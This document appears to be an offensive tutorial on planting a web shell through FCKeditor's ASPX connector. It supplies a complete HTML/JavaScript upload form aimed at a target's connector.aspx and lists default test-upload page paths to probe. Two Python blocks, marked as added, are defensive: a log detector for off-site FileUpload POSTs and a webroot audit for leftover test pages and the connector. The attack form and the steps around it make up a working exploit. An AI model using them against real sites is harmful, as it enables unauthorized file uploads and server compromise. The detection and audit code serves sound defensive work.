Getting a shell through the FCKeditor second (secondary) upload is a typical FCKeditor vulnerability. The second upload requires that the server support ASPX and that the FckEditor/editor/filemanager/connectors/aspx/connector.aspx file has not been deleted. The secondary upload vulnerability is convenient against ASPX sites and has a high success rate. Of course, it also works against an ASP site if the site supports ASPX and the file has not been deleted.
The secondary upload is usually done through one of the test upload pages that ship with FckEditor. On some sites these test upload pages have been deleted, which I have run into many times. When the test upload page has been deleted, an upload page can be constructed locally and submitted. Make sure that the FckEditor/editor/filemanager/connectors/aspx/connector.aspx file exists and that the server supports ASPX parsing.
Code:
<!--
 * FCKeditor - The text editor for Internet - http://www.fckeditor.net
 * Copyright (C) 2003-2007 Frederico Caldeira Knabben
 *
 * == BEGIN LICENSE ==
 *
 * Licensed under the terms of any of the following licenses at your
 * choice:
 *
 *  - GNU General Public License Version 2 or later (the "GPL")
 *    http://www.gnu.org/licenses/gpl.html
 *
 *  - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
 *    http://www.gnu.org/licenses/lgpl.html
 *
 *  - Mozilla Public License Version 1.1 or later (the "MPL")
 *    http://www.mozilla.org/MPL/MPL-1.1.html
 *
 * == END LICENSE ==
 *
 * Test page for the File Browser connectors.
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FCKeditor - Connectors Tests</title>
<script type="text/javascript">
// Build the connector request URL from the selected connector, resource type and folder.
function BuildBaseUrl(command)
{
    var sUrl =
        document.getElementById('cmbConnector').value +
        '?Command=' + command +
        '&Type=' + document.getElementById('cmbType').value +
        '&CurrentFolder=' + encodeURIComponent(document.getElementById('txtFolder').value);
    return sUrl;
}
// Load a connector URL into the result frame and show it on the page.
function SetFrameUrl(url)
{
    document.getElementById('eRunningFrame').src = url;
    document.getElementById('eUrl').innerHTML = url;
}
function GetFolders()
{
    SetFrameUrl(BuildBaseUrl('GetFolders'));
    return false;
}
function GetFoldersAndFiles()
{
    SetFrameUrl(BuildBaseUrl('GetFoldersAndFiles'));
    return false;
}
function CreateFolder()
{
    var sFolder = prompt('Type the folder name:', 'Test Folder');
    if (!sFolder)
        return false;
    var sUrl = BuildBaseUrl('CreateFolder');
    sUrl += '&NewFolderName=' + encodeURIComponent(sFolder);
    SetFrameUrl(sUrl);
    return false;
}
// Callback invoked by the connector's response after an upload.
function OnUploadCompleted(errorNumber, fileName)
{
    switch (errorNumber)
    {
        case 0:
            alert('File uploaded with no errors');
            break;
        case 201:
            GetFoldersAndFiles();
            alert('A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"');
            break;
        case 202:
            alert('Invalid file');
            break;
        default:
            alert('Error on file upload. Error number: ' + errorNumber);
            break;
    }
}
this.frames.frmUpload = this;
// Point the upload form at the connector's FileUpload command before submitting.
function SetAction()
{
    var sUrl = BuildBaseUrl('FileUpload');
    document.getElementById('eUrl').innerHTML = sUrl;
    document.getElementById('frmUpload').action = sUrl;
}
</script>
</head>
<body>
<table height="100%" cellspacing="0" cellpadding="0" width="100%" border="0">
<tr>
<td>
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td>
Connector:<br/>
<select id="cmbConnector" name="cmbConnector">
<option value="asp/connector.asp" selected="selected">ASP</option>
<option value="http://www.xxx.com/FckEditor/editor/filemanager/connectors/aspx/connector.aspx">ASP.Net</option>
<option value="cfm/connector.cfm">ColdFusion</option>
<option value="lasso/connector.lasso">Lasso</option>
<option value="perl/connector.cgi">Perl</option>
<option value="php/connector.php">PHP</option>
<option value="py/connector.py">Python</option>
</select>
</td>
<td>
</td>
<td>
Current Folder<br/>
<input id="txtFolder" type="text" value="/" name="txtFolder"/></td>
<td>
</td>
<td>
Resource Type<br/>
<select id="cmbType" name="cmbType">
<option value="File" selected="selected">File</option>
<option value="Image">Image</option>
<option value="Flash">Flash</option>
<option value="Media">Media</option>
<option value="Invalid">Invalid Type (for testing)</option>
</select>
</td>
</tr>
</table>
<br/>
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td valign="top">
<a href="#" onclick="GetFolders();">Get Folders</a></td>
<td>
</td>
<td valign="top">
<a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
<td>
</td>
<td valign="top">
<a href="#" onclick="CreateFolder();">Create Folder</a></td>
<td>
</td>
<td valign="top">
<form id="frmUpload" action="" target="eRunningFrame" method="post" enctype="multipart/form-data">
File Upload<br/>
<input id="txtFileUpload" type="file" name="NewFile"/>
<input type="submit" value="Upload" onclick="SetAction();"/>
</form>
</td>
</tr>
</table>
<br/>
URL: <span id="eUrl"></span>
</td>
</tr>
<tr>
<td height="100%" valign="top">
<iframe id="eRunningFrame" src="javascript:void(0)" name="eRunningFrame" width="100%"
height="100%"></iframe>
</td>
</tr>
</table>
</body>
</html>
The value in <option value="http://www.xxx.com/FckEditor/editor/filemanager/connectors/aspx/connector.aspx">ASP.Net</option> is the ASPX upload execution path. ASP and PHP work the same way; add their paths when you need them.
Addresses of the test upload pages in FCKeditor:
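Because the form above is submitted from a page that does not live on the site, the resulting request stands out in the web server log. The following is an added detection example, not part of the original article or of FCKeditor: it flags FileUpload POSTs to a connector whose Referer is missing or names another host. The log lines are constructed, and the field list (including cs-host, which IIS does not log by default) is an assumption about the logging configuration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed IIS W3C log sample (not from a real server).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs-host cs(Referer) sc-status
2024-01-05 10:01:11 GET /FckEditor/editor/filemanager/connectors/aspx/connector.aspx Command=GetFolders&Type=File&CurrentFolder=%2F 198.51.100.7 www.example.test http://www.example.test/admin/edit.aspx 200
2024-01-05 10:02:40 POST /FckEditor/editor/filemanager/connectors/aspx/connector.aspx Command=FileUpload&Type=File&CurrentFolder=%2F 203.0.113.9 www.example.test - 200
2024-01-05 10:03:02 POST /FckEditor/editor/filemanager/connectors/aspx/connector.aspx Command=FileUpload&Type=Image&CurrentFolder=%2F 198.51.100.7 www.example.test http://www.example.test/admin/edit.aspx 200
2024-01-05 10:04:19 POST /fckeditor/editor/filemanager/connectors/aspx/connector.aspx command=fileupload&Type=File&CurrentFolder=%2F 203.0.113.9 www.example.test http://other.example.net/test.html 200
"""

# Any connector under editor/filemanager (aspx, asp, php, ...), case-insensitive like IIS.
CONNECTOR = re.compile(r"/editor/filemanager/.*connector\.\w+$", re.IGNORECASE)

def find_offsite_uploads(log_text):
    """Return (date, time, client IP, referer) for FileUpload POSTs to an
    FCKeditor connector whose Referer is missing or names another host."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for the rows that follow
            continue
        if not line or line.startswith("#"):
            continue
        row = dict(zip(fields, line.split()))
        if row.get("cs-method") != "POST":
            continue
        if not CONNECTOR.search(row.get("cs-uri-stem", "")):
            continue
        query = parse_qs(row.get("cs-uri-query", "").lower())
        if query.get("command") != ["fileupload"]:
            continue
        referer = row.get("cs(Referer)", "-")
        ref_host = (urlsplit(referer).hostname or "") if referer != "-" else ""
        if ref_host != row.get("cs-host", "").lower():
            hits.append((row["date"], row["time"], row["c-ip"], referer))
    return hits

if __name__ == "__main__":
    for hit in find_offsite_uploads(SAMPLE_LOG):
        print(*hit)
```

The Referer header is client-controlled, so hits are triage leads to confirm against the files actually written to the upload folder.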
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
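
Since removing the test pages does not remove the exposure (the connector is what accepts the upload), a cleanup check should look for both. The following is an added audit example, not part of the original article or of FCKeditor: it walks a webroot for the test pages listed above and for the ASPX connector. The sample tree built by make_sample_tree is constructed, and the function names are hypothetical.

```python
import os

# Paths relative to the FCKeditor directory, taken from the list above.
TEST_PAGES = (
    "editor/filemanager/browser/default/connectors/test.html",
    "editor/filemanager/upload/test.html",
    "editor/filemanager/connectors/test.html",
    "editor/filemanager/connectors/uploadtest.html",
)
# The connector the article relies on; it stays reachable without any test page.
ASPX_CONNECTOR = "editor/filemanager/connectors/aspx/connector.aspx"

def files_under(base):
    """Map lower-cased relative path -> real path (IIS paths are case-insensitive)."""
    found = {}
    for dirpath, _, names in os.walk(base):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, base).replace(os.sep, "/").lower()
            found[rel] = full
    return found

def audit_webroot(webroot):
    """Return sorted (kind, path) findings for every FCKeditor copy under webroot."""
    findings = []
    for dirpath, dirnames, _ in os.walk(webroot):
        for d in dirnames:
            if d.lower() != "fckeditor":
                continue
            files = files_under(os.path.join(dirpath, d))
            for rel in TEST_PAGES:
                if rel in files:
                    findings.append(("test-page", files[rel]))
            if ASPX_CONNECTOR in files:
                findings.append(("aspx-connector", files[ASPX_CONNECTOR]))
    return sorted(findings)

def make_sample_tree(root):
    """Build a constructed webroot: one copy with only the connector, one with a test page."""
    for rel in ("site/FckEditor/" + ASPX_CONNECTOR,
                "old/fckeditor/editor/filemanager/connectors/uploadtest.html"):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()

if __name__ == "__main__":
    import sys
    for kind, path in audit_webroot(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(kind, path)
```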